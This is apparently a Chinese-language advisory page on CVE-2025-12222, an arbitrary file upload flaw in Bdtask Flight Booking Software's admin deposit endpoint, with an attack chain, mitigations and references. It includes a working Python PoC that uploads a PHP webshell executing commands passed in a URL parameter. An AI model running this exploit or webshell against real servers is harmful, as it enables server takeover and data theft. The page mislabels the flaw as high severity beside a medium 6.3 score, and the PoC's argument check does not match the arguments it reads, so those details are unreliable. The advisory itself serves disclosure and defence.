CVE-2025-12222 | Bdtask Flight Booking Software 任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-12222

漏洞类型

任意文件上传

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Bdtask Flight Booking Software

漏洞概述

CVE-2025-12222是Bdtask Flight Booking Software中存在的一个高危安全漏洞。该漏洞位于管理后台的存款处理器（Deposit Handler）组件中，具体涉及/admin/transaction/deposit路径。由于系统对用户上传的文件缺乏有效的验证和过滤机制，攻击者可以绕过安全检查，上传任意类型的恶意文件到服务器。漏洞的CVSS评分为6.3，属于中等严重程度，但考虑到其可能导致远程代码执行（RCE）的潜在风险，实际威胁程度不容忽视。攻击者可以利用该漏洞上传webshell，从而获得服务器的完全控制权，执行任意系统命令、窃取敏感数据或进行进一步的内网渗透。该漏洞已被公开披露，且可能已被实际利用。由于软件供应商未对此安全问题做出响应，建议用户尽快采取防护措施。

技术细节

该漏洞属于经典的任意文件上传（Unrestricted File Upload）类型安全缺陷。在Bdtask Flight Booking Software的Deposit Handler组件中，/admin/transaction/deposit端点未能对上传文件的类型、内容和扩展名进行严格的服务器端验证。攻击者可以通过构造恶意请求，绕过客户端的JavaScript验证或简单的MIME类型检查，上传包含恶意代码的文件（如PHP、JSP、ASP webshell或其他可执行脚本）。上传成功后，攻击者通过访问上传文件的URL路径即可触发执行恶意代码。由于该漏洞位于管理后台（/admin路径），攻击者需要具备低权限的管理员账户即可利用此漏洞。CVSS向量显示攻击复杂度低（AC:L），无需用户交互（UI:N），这意味着攻击具有较高的可行性。攻击成功后，攻击者可以在Web服务器上下文环境中执行任意命令，严重威胁系统安全。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标站点使用Bdtask Flight Booking Software，访问/admin/transaction/deposit端点

STEP 2

步骤2

获取访问权限：使用低权限管理员账户登录管理后台（可通过默认凭证、暴力破解或社工手段获取）

STEP 3

步骤3

构造恶意请求：准备包含webshell代码的恶意文件（如shell.php），绕过文件类型检查

STEP 4

步骤4

上传文件：通过/admin/transaction/deposit端点上传恶意文件，由于缺乏严格的服务器端验证，文件上传成功

STEP 5

步骤5

触发执行：访问上传文件的URL路径，服务器解析并执行恶意代码

STEP 6

步骤6

远程控制：通过webshell执行任意系统命令，获取服务器完全控制权，可进行数据窃取或内网渗透

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-12222 PoC - Bdtask Flight Booking Software Unrestricted Upload
# Target: /admin/transaction/deposit

def exploit(target_url, username, password, webshell_content):
    """
    Exploit for CVE-2025-12222
    This PoC demonstrates uploading a webshell to the vulnerable endpoint
    """
    login_url = target_url.rstrip('/') + '/admin/login'
    upload_url = target_url.rstrip('/') + '/admin/transaction/deposit'
    
    # Step 1: Authenticate with low-privilege admin account
    session = requests.Session()
    login_data = {
        'email': username,
        'password': password
    }
    
    try:
        resp = session.post(login_url, data=login_data, timeout=10)
        if resp.status_code != 200:
            print('[-] Login failed - check credentials')
            return False
        
        print('[+] Successfully authenticated')
        
        # Step 2: Upload malicious file via deposit handler
        files = {
            'deposit_file': ('shell.php', webshell_content, 'application/x-php')
        }
        
        upload_resp = session.post(upload_url, files=files, timeout=10)
        
        if upload_resp.status_code == 200:
            print('[+] File uploaded successfully')
            print(f'[+] Access webshell at: {target_url}/uploads/shell.php')
            return True
        else:
            print(f'[-] Upload failed with status: {upload_resp.status_code}')
            return False
            
    except requests.RequestException as e:
        print(f'[-] Request error: {str(e)}')
        return False

if __name__ == '__main__':
    if len(sys.argv) < 3:
        print(f'Usage: python {sys.argv[0]} <target_url> <username> <password>')
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    
    # Simple PHP webshell
    webshell = '<?php system($_GET["cmd"]); ?>'
    
    exploit(target, user, pwd, webshell)

影响范围

Bdtask Flight Booking Software <= 3.1

防御指南

临时缓解措施

由于软件供应商未提供官方修复补丁，建议采取以下临时缓解措施：1）限制/admin路径的访问来源，仅允许可信IP访问管理后台；2）在Web服务器配置中禁用上传目录的脚本执行权限（如在Nginx中配置location /uploads { deny all; }）；3）实施严格的访问控制策略，使用强密码策略并定期更换；4）启用详细的访问日志和文件上传日志监控，及时发现异常行为；5）考虑使用WAF产品进行虚拟补丁，拦截针对该漏洞的攻击尝试；6）如果业务允许，暂时禁用Deposit Handler功能，待官方修复后再启用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12222
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12222
3 Details https://www.cvedetails.com/cve/CVE-2025-12222/
4 VulDB https://vuldb.com/cve/CVE-2025-12222
5 Link https://github.com/4m3rr0r/PoCVulDb/blob/main/CVE-2025-12222.md
6 Link https://vuldb.com/?ctiid.329892
7 Link https://vuldb.com/?id.329892
8 Link https://vuldb.com/?submit.673424